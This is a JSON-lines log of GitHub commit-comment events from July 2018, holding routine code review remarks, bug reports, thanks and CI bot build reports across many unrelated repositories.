{"id":"8025819520","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29851896,"position":null,"line":null,"path":null,"commit_id":"c83d6e44fd8f9dcdf9dd1ab314d016fc54130791","created_at":"2018-07-26T23:56:38Z","updated_at":"2018-07-26T23:56:38Z","author_association":"COLLABORATOR","body":"<h3>[webpack-build-scripts] put assets in assets/ dir, preserve filenames (#2729)</h3>\n\nPreview: <strong><a href='https://19180-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19180-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19180-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-26T23:56:38Z"}
{"id":"8025823413","type":"CommitCommentEvent","actor":{"login":"zairoo"},"repo":{"name":"dvandal/cryptonote-nodejs-pool"},"payload":{"comment":{"id":29851927,"position":null,"line":null,"path":null,"commit_id":"16a8721b9095f07f8b84a6e1644979da4d80f111","created_at":"2018-07-26T23:58:02Z","updated_at":"2018-07-26T23:58:02Z","author_association":"NONE","body":"after pool upgrade, redis unable to create\r\n***coin:charts:hashrate:wallet\r\n***coin:charts:worker_hashrate:wallet~workname\r\n\r\nrestarted the pool Waiting for a long time and not creating it"}},"created_at":"2018-07-26T23:58:02Z"}
{"id":"8025826486","type":"CommitCommentEvent","actor":{"login":"vana-abbott"},"repo":{"name":"vana-abbott/unit-4-game"},"payload":{"comment":{"id":29851929,"position":null,"line":null,"path":null,"commit_id":"6914a1ee1465e0e5fbd23aea32e96c911cb1307b","created_at":"2018-07-26T23:59:14Z","updated_at":"2018-07-26T23:59:14Z","author_association":"OWNER","body":"Thanks"}},"created_at":"2018-07-26T23:59:14Z"}
{"id":"8020137667","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29838146,"position":null,"line":null,"path":null,"commit_id":"e80656c48b015cc7410e7c7e976766b65d173b8e","created_at":"2018-07-26T03:00:15Z","updated_at":"2018-07-26T03:00:15Z","author_association":"OWNER","body":"check for 8ebecae5a0b50a1a0d36e6147f10d60a0f583ae8"}},"created_at":"2018-07-26T03:00:15Z"}
{"id":"8020139757","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"chuchujenny/X-Village-HW1"},"payload":{"comment":{"id":29838149,"position":13,"line":18,"path":"matrix.py","commit_id":"5a2bd03aece4f52efc7a40ee7fcc50bdc6b542b0","created_at":"2018-07-26T03:00:56Z","updated_at":"2018-07-26T03:00:56Z","author_association":"NONE","body":"同理，寫成 `self.matrix.append(m)`"}},"created_at":"2018-07-26T03:00:56Z"}
{"id":"8020140662","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29838153,"position":24,"line":118,"path":"src/pow_fpga_LampaLab.c","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-26T03:01:17Z","updated_at":"2018-07-26T03:01:17Z","author_association":"OWNER","body":"Check for 8ebecae5a0b50a1a0d36e6147f10d60a0f583ae8"}},"created_at":"2018-07-26T03:01:17Z"}
{"id":"8020141036","type":"CommitCommentEvent","actor":{"login":"gilbode"},"repo":{"name":"markxnelson/spinnaker.github.io"},"payload":{"comment":{"id":29838154,"position":4,"line":27,"path":"setup/ci/index.md","commit_id":"bf3dbd8b54ee142829ecdbcf05de3f7b994993c2","created_at":"2018-07-26T03:01:25Z","updated_at":"2018-07-26T03:01:25Z","author_association":"NONE","body":"Don't call it Wercker CI, just Wercker."}},"created_at":"2018-07-26T03:01:25Z"}
{"id":"8020142597","type":"CommitCommentEvent","actor":{"login":"7iYe"},"repo":{"name":"gongwen/MarqueeViewLibrary"},"payload":{"comment":{"id":29838158,"position":null,"line":null,"path":null,"commit_id":"704464032a50bd0eebab67aa1e5dc3794edd2794","created_at":"2018-07-26T03:01:58Z","updated_at":"2018-07-26T03:01:58Z","author_association":"NONE","body":"Do you have this problem? It's the same mistake to use your demo in time. My Gardle is using 4.4 . SDK is using 27 , Android Studio used 3.1\r\n![error](https://user-images.githubusercontent.com/30172295/43238972-106a8f9e-90c3-11e8-90d6-8f48733b597c.jpg)\r\n\r\n"}},"created_at":"2018-07-26T03:01:58Z"}
{"id":"8020144837","type":"CommitCommentEvent","actor":{"login":"erikmchut"},"repo":{"name":"kripken/emscripten"},"payload":{"comment":{"id":29838161,"position":null,"line":null,"path":null,"commit_id":"6b878b6a8c70c3a6a50138c06f1376b9d0b31141","created_at":"2018-07-26T03:02:37Z","updated_at":"2018-07-26T03:02:37Z","author_association":"NONE","body":"Thanks for the quick fix."}},"created_at":"2018-07-26T03:02:37Z"}
{"id":"8020155589","type":"CommitCommentEvent","actor":{"login":"yozman"},"repo":{"name":"ionic-team/ionic"},"payload":{"comment":{"id":29838180,"position":null,"line":null,"path":null,"commit_id":"0db643df450a6083f5b5a8031f56e720ab933775","created_at":"2018-07-26T03:06:48Z","updated_at":"2018-07-26T03:06:48Z","author_association":"NONE","body":"WOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOW😍"}},"created_at":"2018-07-26T03:06:48Z"}
{"id":"8020163875","type":"CommitCommentEvent","actor":{"login":"gilbode"},"repo":{"name":"markxnelson/spinnaker.github.io"},"payload":{"comment":{"id":29838191,"position":11,"line":11,"path":"setup/ci/wercker.md","commit_id":"bf3dbd8b54ee142829ecdbcf05de3f7b994993c2","created_at":"2018-07-26T03:09:58Z","updated_at":"2018-07-26T03:09:58Z","author_association":"NONE","body":"Change the hyperlink to the home page (not /product) which will get redirected somewhere eventually.  Don't capitalize Cloud.  And don't say \"Oracle's\".  There is some details about how products are supposed to be referred to and Wercker is not an official Oracle Product name, so I'd just use Wercker for now."}},"created_at":"2018-07-26T03:09:58Z"}
{"id":"8020166421","type":"CommitCommentEvent","actor":{"login":"gilbode"},"repo":{"name":"markxnelson/spinnaker.github.io"},"payload":{"comment":{"id":29838192,"position":39,"line":39,"path":"setup/ci/wercker.md","commit_id":"bf3dbd8b54ee142829ecdbcf05de3f7b994993c2","created_at":"2018-07-26T03:10:54Z","updated_at":"2018-07-26T03:10:54Z","author_association":"NONE","body":"Do not use dev.wercker.com (we don't really advertise this)."}},"created_at":"2018-07-26T03:10:54Z"}
{"id":"8020167524","type":"CommitCommentEvent","actor":{"login":"gilbode"},"repo":{"name":"markxnelson/spinnaker.github.io"},"payload":{"comment":{"id":29838193,"position":40,"line":40,"path":"setup/ci/wercker.md","commit_id":"bf3dbd8b54ee142829ecdbcf05de3f7b994993c2","created_at":"2018-07-26T03:11:19Z","updated_at":"2018-07-26T03:11:19Z","author_association":"NONE","body":"Don't use a real username."}},"created_at":"2018-07-26T03:11:19Z"}
{"id":"8020168271","type":"CommitCommentEvent","actor":{"login":"ufo1024k"},"repo":{"name":"SoDa-GitHub/shadowsocksrr-csharp"},"payload":{"comment":{"id":29838196,"position":null,"line":null,"path":null,"commit_id":"d587866c76a81426d5d27a09511388aa46ff852e","created_at":"2018-07-26T03:11:34Z","updated_at":"2018-07-26T03:11:34Z","author_association":"NONE","body":"万分感谢你对这个项目继续更新。服务器订阅里有一项还是英文，希望汉化为中文，辛苦了"}},"created_at":"2018-07-26T03:11:34Z"}
{"id":"8020171046","type":"CommitCommentEvent","actor":{"login":"nsgoyat"},"repo":{"name":"VirtuBox/nginx-ee"},"payload":{"comment":{"id":29838206,"position":null,"line":null,"path":null,"commit_id":"4e4abffb94ff1921cfe696e6d16e36e07fb95744","created_at":"2018-07-26T03:12:35Z","updated_at":"2018-07-26T03:12:35Z","author_association":"NONE","body":"Hello Master,\r\nThanks for the performance update. Actually, I have a server with Ubuntu 18.04 where I already had the previous version of your Nginx-EE Bash Script. Today, I run it to have the latest open SSL and it installed successfully.\r\n\r\nI even restarted the server but still, the OpenSSL version is shown as 1.1.0h (27 March 2018). Also, I am unable to see TLS 1.3 Support for my site in Chrome."}},"created_at":"2018-07-26T03:12:35Z"}
{"id":"8020179128","type":"CommitCommentEvent","actor":{"login":"dabobrovskiy"},"repo":{"name":"GG1624/test1"},"payload":{"comment":{"id":29838216,"position":null,"line":null,"path":null,"commit_id":"8c712fc557a4719bc096b284ca38311045c32620","created_at":"2018-07-26T03:15:40Z","updated_at":"2018-07-26T03:15:40Z","author_association":"NONE","body":"proverka govna?"}},"created_at":"2018-07-26T03:15:40Z"}
{"id":"8020179500","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29838219,"position":null,"line":null,"path":null,"commit_id":"521c64f490e6c5ee1024211be560984242f06f52","created_at":"2018-07-26T03:15:48Z","updated_at":"2018-07-26T03:15:48Z","author_association":"COLLABORATOR","body":"- New action type: `OVERLAY_SET_PINNED`\r\n- New analytic event: `overlay_pin_toggled`\r\n- New icons: `WidgetPinned`, `WidgetUnpinned`\r\n\r\n## New strings\r\n- `OVERLAY_WIDGET_TOOLTIP_PIN: \"Pin to game\"`\r\n- `OVERLAY_WIDGET_TOOLTIP_UNPIN: \"Unpin from game\"`"}},"created_at":"2018-07-26T03:15:48Z"}
{"id":"8020181217","type":"CommitCommentEvent","actor":{"login":"cqbent"},"repo":{"name":"cqbent/masc-site"},"payload":{"comment":{"id":29838220,"position":null,"line":null,"path":null,"commit_id":"61efabd08ff816839a13890d2e54b9271ba6644f","created_at":"2018-07-26T03:16:28Z","updated_at":"2018-07-26T03:16:28Z","author_association":"OWNER","body":"Created multidev environment [masc-site#ci-78](https://dashboard.pantheon.io/sites/f42e5ac8-ed69-4d8a-ad5e-2220e369251f#ci-78).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-78-masc-site.pantheonsite.io/)"}},"created_at":"2018-07-26T03:16:28Z"}
{"id":"8020182106","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"chuchujenny/X-Village-HW1"},"payload":{"comment":{"id":29838223,"position":10,"line":15,"path":"matrix.py","commit_id":"5a2bd03aece4f52efc7a40ee7fcc50bdc6b542b0","created_at":"2018-07-26T03:16:50Z","updated_at":"2018-07-26T03:16:50Z","author_association":"NONE","body":"這兩個 while loop，因為 i, j 並沒有實際拿來使用，只是計算 loop 執行次數，故可以用 for loop 來寫\r\n```python\r\nfor _ in range(int(nrows)):\r\n    for _ in range(int(ncols)):\r\n        ...\r\n```"}},"created_at":"2018-07-26T03:16:50Z"}
{"id":"8020184323","type":"CommitCommentEvent","actor":{"login":"arthurkiller"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29838232,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T03:17:39Z","updated_at":"2018-07-26T03:17:39Z","author_association":"COLLABORATOR","body":"fixed @ayanamist "}},"created_at":"2018-07-26T03:17:39Z"}
{"id":"8020190849","type":"CommitCommentEvent","actor":{"login":"yangjie482"},"repo":{"name":"yangjie482/201807-homework"},"payload":{"comment":{"id":29838239,"position":null,"line":null,"path":null,"commit_id":"7683e6a4f3333b79bba85f5379fe2d738199356f","created_at":"2018-07-26T03:20:00Z","updated_at":"2018-07-26T03:20:00Z","author_association":"OWNER","body":".."}},"created_at":"2018-07-26T03:20:00Z"}
{"id":"8020192077","type":"CommitCommentEvent","actor":{"login":"yangjie482"},"repo":{"name":"yangjie482/201807-homework"},"payload":{"comment":{"id":29838243,"position":null,"line":null,"path":null,"commit_id":"7683e6a4f3333b79bba85f5379fe2d738199356f","created_at":"2018-07-26T03:20:29Z","updated_at":"2018-07-26T03:20:29Z","author_association":"OWNER","body":"杨杰作业"}},"created_at":"2018-07-26T03:20:29Z"}
{"id":"8020194962","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29838248,"position":null,"line":null,"path":null,"commit_id":"ad8538c5f1d45549ef8962ceee37b37724cb218e","created_at":"2018-07-26T03:21:34Z","updated_at":"2018-07-26T03:21:34Z","author_association":"OWNER","body":"Well. . it does make sense that if we already have a pawn threatening the\nopponent piece, giving a bonus for attacking that piece again may seem like\na waste.  Sure seems unnecessary though.  Thanks for the congrats.\n\nOn Wed, Jul 25, 2018 at 8:51 PM, Jekaa <notifications@github.com> wrote:\n\n> Congrats! From the very beginning I did not understand why this condition\n> is here.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/ad8538c5f1d45549ef8962ceee37b37724cb218e#commitcomment-29838112>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSN8P80NC8wPbmuXmI5M3sChYVh8Pks5uKS6wgaJpZM4VhGAt>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-26T03:21:34Z"}
{"id":"8020195934","type":"CommitCommentEvent","actor":{"login":"Copypeng"},"repo":{"name":"NordicSemiconductor/IOS-nRF-Mesh-Library"},"payload":{"comment":{"id":29838252,"position":null,"line":null,"path":null,"commit_id":"34d0a7a04cd20b1b9ac5147b71ef52110a6ce89f","created_at":"2018-07-26T03:21:56Z","updated_at":"2018-07-26T03:21:56Z","author_association":"NONE","body":"how about make the \r\n\r\n`if segAcknowledgeTimeout !=ni {\r\n//\r\n}` \r\n\r\ncode into a func ?\r\n\r\nI saw you repeat them twice in this commit. \r\n\r\n😀\r\n"}},"created_at":"2018-07-26T03:21:56Z"}
{"id":"8020218078","type":"CommitCommentEvent","actor":{"login":"shoreliner"},"repo":{"name":"KevinOConnor/klipper"},"payload":{"comment":{"id":29838290,"position":null,"line":null,"path":null,"commit_id":"17300f4120a66130a34e9432708e3e266e2126b6","created_at":"2018-07-26T03:30:21Z","updated_at":"2018-07-26T03:30:21Z","author_association":"NONE","body":"I just began building one of these a few days ago.  I can assist with whatever testing is necessary; I am also going to be implementing Mechadunios... using Klipper's multiple MCU mode, I think we can utilize them effectively.  --  Dave"}},"created_at":"2018-07-26T03:30:21Z"}
{"id":"8020218507","type":"CommitCommentEvent","actor":{"login":"Aesrath"},"repo":{"name":"Aesrath/Tuition_Grant"},"payload":{"comment":{"id":29838292,"position":null,"line":null,"path":null,"commit_id":"56d75d9fe12cd368a56a0efe086ed35901d9ebb9","created_at":"2018-07-26T03:30:30Z","updated_at":"2018-07-26T03:30:30Z","author_association":"OWNER","body":"stupid"}},"created_at":"2018-07-26T03:30:30Z"}
{"id":"8020220142","type":"CommitCommentEvent","actor":{"login":"chenpeng910917"},"repo":{"name":"chenpeng910917/market"},"payload":{"comment":{"id":29838295,"position":null,"line":null,"path":null,"commit_id":"9bfe6eb5e0ad4993015d33011e08423c15b2f243","created_at":"2018-07-26T03:31:08Z","updated_at":"2018-07-26T03:31:08Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-26T03:31:08Z"}
{"id":"8020224699","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29838300,"position":4,"line":18,"path":"src/dcurl.c","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-26T03:32:58Z","updated_at":"2018-07-26T03:32:58Z","author_association":"NONE","body":"Replace `ENABLE_FPGA_LAMPALAB` with `ENABLE_FPGA_ACCEL` to indicate what FPGA really does to `dcurl`."}},"created_at":"2018-07-26T03:32:58Z"}
{"id":"8020224767","type":"CommitCommentEvent","actor":{"login":"candramilenium"},"repo":{"name":"MicrosoftDocs/windows-itpro-docs"},"payload":{"comment":{"id":29838301,"position":7,"line":45,"path":"browsers/edge/includes/set-home-button-url-include.md","commit_id":"671b381a30a36fb86b745e15d377d9e212bf1cf9","created_at":"2018-07-26T03:32:59Z","updated_at":"2018-07-26T03:32:59Z","author_association":"NONE","body":"SetHomeButtonURL"}},"created_at":"2018-07-26T03:32:59Z"}
{"id":"8020226526","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29838305,"position":5,"line":19,"path":"src/dcurl.c","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-26T03:33:39Z","updated_at":"2018-07-26T03:33:39Z","author_association":"NONE","body":"Ditto. It should be `pow_fpga_accel.h`"}},"created_at":"2018-07-26T03:33:39Z"}
{"id":"8020227120","type":"CommitCommentEvent","actor":{"login":"candramilenium"},"repo":{"name":"MicrosoftDocs/windows-itpro-docs"},"payload":{"comment":{"id":29838306,"position":null,"line":null,"path":null,"commit_id":"671b381a30a36fb86b745e15d377d9e212bf1cf9","created_at":"2018-07-26T03:33:53Z","updated_at":"2018-07-26T03:33:53Z","author_association":"NONE","body":"SetHomeButtonURL"}},"created_at":"2018-07-26T03:33:53Z"}
{"id":"8020228308","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29838311,"position":32,"line":185,"path":"src/dcurl.c","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-26T03:34:21Z","updated_at":"2018-07-26T03:34:21Z","author_association":"NONE","body":"Ditto. The name scheme is `PowFPGAAccel`."}},"created_at":"2018-07-26T03:34:21Z"}
{"id":"8020235368","type":"CommitCommentEvent","actor":{"login":"jcapellman"},"repo":{"name":"akashkw/practice"},"payload":{"comment":{"id":29838327,"position":null,"line":null,"path":null,"commit_id":"9134f1d524a07562f0557ac20a5abfb7ba7f623a","created_at":"2018-07-26T03:37:08Z","updated_at":"2018-07-26T03:37:08Z","author_association":"NONE","body":"auto is a good replacement for defining variables that are initialized (akin to var in C#)"}},"created_at":"2018-07-26T03:37:08Z"}
{"id":"8020236143","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29838329,"position":null,"line":null,"path":null,"commit_id":"90cde2dc05d2a15eba4dc7bebe32cbf01f4a7652","created_at":"2018-07-26T03:37:25Z","updated_at":"2018-07-26T03:37:25Z","author_association":"NONE","body":"Use `git rebase -i` to improve Git commit messages as [How to Write a Git Commit Message](https://chris.beams.io/posts/git-commit/) suggested."}},"created_at":"2018-07-26T03:37:25Z"}
{"id":"8020240631","type":"CommitCommentEvent","actor":{"login":"toote"},"repo":{"name":"neufieldrobotics/rosdistro"},"payload":{"comment":{"id":29838341,"position":null,"line":null,"path":null,"commit_id":"b3be2d483debb62bee321604ae5746508a554cd1","created_at":"2018-07-26T03:39:06Z","updated_at":"2018-07-26T03:39:06Z","author_association":"NONE","body":"Thanks, but the credit should go to @tfoote instead"}},"created_at":"2018-07-26T03:39:06Z"}
{"id":"8020243728","type":"CommitCommentEvent","actor":{"login":"wqser"},"repo":{"name":"wqser/mytestsshgithub"},"payload":{"comment":{"id":29838343,"position":7,"line":7,"path":"src/javatest/HelloTest.java","commit_id":"dc858584012ec89225f7c84290ba9362794afa53","created_at":"2018-07-26T03:40:17Z","updated_at":"2018-07-26T03:40:17Z","author_association":"OWNER","body":"444"}},"created_at":"2018-07-26T03:40:17Z"}
{"id":"8020244694","type":"CommitCommentEvent","actor":{"login":"ivannkarl"},"repo":{"name":"pjcordero04/ictproglab"},"payload":{"comment":{"id":29838346,"position":null,"line":null,"path":null,"commit_id":"be0fd58cf1b64ff1685d4a4a16e80d2b399f9b02","created_at":"2018-07-26T03:40:37Z","updated_at":"2018-07-26T03:40:37Z","author_association":"COLLABORATOR","body":"Hello World"}},"created_at":"2018-07-26T03:40:37Z"}
{"id":"8020244855","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29838347,"position":1,"line":null,"path":"1532576442.19/github_test.txt","commit_id":"da3cefebcceef2e050f84d582f10e2cfdf0e189e","created_at":"2018-07-26T03:40:43Z","updated_at":"2018-07-26T03:40:43Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-26T03:40:43Z"}
{"id":"8020246047","type":"CommitCommentEvent","actor":{"login":"markbland85"},"repo":{"name":"meefik/avd-root"},"payload":{"comment":{"id":29838349,"position":5,"line":4,"path":"README.md","commit_id":"1a5587acacf6e6b87e1f54cb55c5d864459c9dcf","created_at":"2018-07-26T03:41:10Z","updated_at":"2018-07-26T03:41:10Z","author_association":"NONE","body":"Hey"}},"created_at":"2018-07-26T03:41:10Z"}
{"id":"8020254294","type":"CommitCommentEvent","actor":{"login":"duchungk7"},"repo":{"name":"duchungk7/Verilog-Design-for-FPGA"},"payload":{"comment":{"id":29838360,"position":null,"line":null,"path":null,"commit_id":"882584949705059dc550752255afabdbc4615e61","created_at":"2018-07-26T03:44:26Z","updated_at":"2018-07-26T03:44:26Z","author_association":"OWNER","body":"Cách khởi tạo module trong verilog & các ví dụ"}},"created_at":"2018-07-26T03:44:26Z"}
{"id":"8020256980","type":"CommitCommentEvent","actor":{"login":"caiwei1096"},"repo":{"name":"caiwei1096/20180726test"},"payload":{"comment":{"id":29838371,"position":null,"line":null,"path":null,"commit_id":"7683e6a4f3333b79bba85f5379fe2d738199356f","created_at":"2018-07-26T03:45:28Z","updated_at":"2018-07-26T03:45:28Z","author_association":"OWNER","body":"20180726lzh"}},"created_at":"2018-07-26T03:45:28Z"}
{"id":"8020258835","type":"CommitCommentEvent","actor":{"login":"kaijiu1013"},"repo":{"name":"kaijiu1013/my-website"},"payload":{"comment":{"id":29838375,"position":1,"line":1,"path":"lipsum.txt","commit_id":"a97f30afea6212b7c2fe148cbc65b27b5083ae22","created_at":"2018-07-26T03:46:12Z","updated_at":"2018-07-26T03:46:12Z","author_association":"OWNER","body":"this is the commet "}},"created_at":"2018-07-26T03:46:12Z"}
{"id":"8020264231","type":"CommitCommentEvent","actor":{"login":"rogerman"},"repo":{"name":"TASVideos/desmume"},"payload":{"comment":{"id":29838387,"position":null,"line":null,"path":null,"commit_id":"b0a6188902b1657451b413aa76c855145d6c375e","created_at":"2018-07-26T03:48:20Z","updated_at":"2018-07-26T03:48:20Z","author_association":"COLLABORATOR","body":"To note, this commit effectively reverts the previous commit, cbd488e."}},"created_at":"2018-07-26T03:48:20Z"}
{"id":"8020266273","type":"CommitCommentEvent","actor":{"login":"asreimer"},"repo":{"name":"asreimer/pyAMISR"},"payload":{"comment":{"id":29838394,"position":null,"line":null,"path":null,"commit_id":"5764948f65c52ce7dd176c4d6a0861ed2d7c7655","created_at":"2018-07-26T03:49:09Z","updated_at":"2018-07-26T03:49:09Z","author_association":"OWNER","body":"This actually fixes #5, not #1 "}},"created_at":"2018-07-26T03:49:09Z"}
{"id":"8020267494","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29838396,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-26T03:49:38Z","updated_at":"2018-07-26T03:49:38Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2304 of 2304 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-26T03:49:38Z"}
{"id":"8020270979","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29838407,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-26T03:51:00Z","updated_at":"2018-07-26T03:51:00Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T03:51:00Z"}
{"id":"8020271000","type":"CommitCommentEvent","actor":{"login":"soybeanxiaobi"},"repo":{"name":"soybeanxiaobi/React_demo_onlineShop"},"payload":{"comment":{"id":29838408,"position":null,"line":null,"path":null,"commit_id":"f8d426a5a2c4d54cee0dd2fd504b17d0b20e059a","created_at":"2018-07-26T03:51:01Z","updated_at":"2018-07-26T03:51:01Z","author_association":"OWNER","body":"image"}},"created_at":"2018-07-26T03:51:01Z"}
{"id":"8020278790","type":"CommitCommentEvent","actor":{"login":"ajinkya933"},"repo":{"name":"KishoreKarunakaran/CloudML-Serving"},"payload":{"comment":{"id":29838416,"position":4,"line":14,"path":"text/ToxicComments_MultiLabel/README.md","commit_id":"a963e03d235e9b97eaf0d0024973b4d420967f6f","created_at":"2018-07-26T03:54:12Z","updated_at":"2018-07-26T03:54:12Z","author_association":"NONE","body":"where can I find build_vocab.py file? it is not present on the linked drive"}},"created_at":"2018-07-26T03:54:12Z"}
{"id":"8020279739","type":"CommitCommentEvent","actor":{"login":"habib-123"},"repo":{"name":"habib-123/testproject"},"payload":{"comment":{"id":29838421,"position":null,"line":null,"path":null,"commit_id":"e0fec46f20521efcc5b3d3472ca4d9bef908ae46","created_at":"2018-07-26T03:54:35Z","updated_at":"2018-07-26T03:54:35Z","author_association":"OWNER","body":"not required"}},"created_at":"2018-07-26T03:54:35Z"}
{"id":"8020280062","type":"CommitCommentEvent","actor":{"login":"byejude"},"repo":{"name":"CarryWill/cskaoyan"},"payload":{"comment":{"id":29838422,"position":null,"line":null,"path":null,"commit_id":"b95e2e087f57d8794172fc31efcef24fd9126d50","created_at":"2018-07-26T03:54:42Z","updated_at":"2018-07-26T03:54:42Z","author_association":"NONE","body":"加油帆哥"}},"created_at":"2018-07-26T03:54:42Z"}
{"id":"8020280785","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838423,"position":7,"line":7,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T03:55:00Z","updated_at":"2018-07-26T03:55:00Z","author_association":"NONE","body":"Why not just access data directly?"}},"created_at":"2018-07-26T03:55:00Z"}
{"id":"8020281536","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29838425,"position":null,"line":null,"path":null,"commit_id":"cb33924aedbf207137010cb6d47530dead468a32","created_at":"2018-07-26T03:55:17Z","updated_at":"2018-07-26T03:55:17Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-26T03:55:17Z"}
{"id":"8020282425","type":"CommitCommentEvent","actor":{"login":"zach-morris"},"repo":{"name":"zach-morris/plugin.program.iagl"},"payload":{"comment":{"id":29838429,"position":null,"line":null,"path":null,"commit_id":"361d9355252441a9196ef49081d7023b5ebd7318","created_at":"2018-07-26T03:55:37Z","updated_at":"2018-07-26T03:55:37Z","author_association":"OWNER","body":"Implementation for #2 "}},"created_at":"2018-07-26T03:55:37Z"}
{"id":"8020282755","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838430,"position":10,"line":10,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T03:55:44Z","updated_at":"2018-07-26T03:55:44Z","author_association":"NONE","body":"Same here and with the set. You’ve got them named like they’re public - why not treat them as such?"}},"created_at":"2018-07-26T03:55:44Z"}
{"id":"8020286051","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"chuchujenny/X-Village-HW1"},"payload":{"comment":{"id":29838439,"position":56,"line":58,"path":"matrix.py","commit_id":"5a2bd03aece4f52efc7a40ee7fcc50bdc6b542b0","created_at":"2018-07-26T03:57:02Z","updated_at":"2018-07-26T03:57:02Z","author_association":"NONE","body":"這個錯誤訊息和運算會不合法的原因是一樣的嗎？"}},"created_at":"2018-07-26T03:57:02Z"}
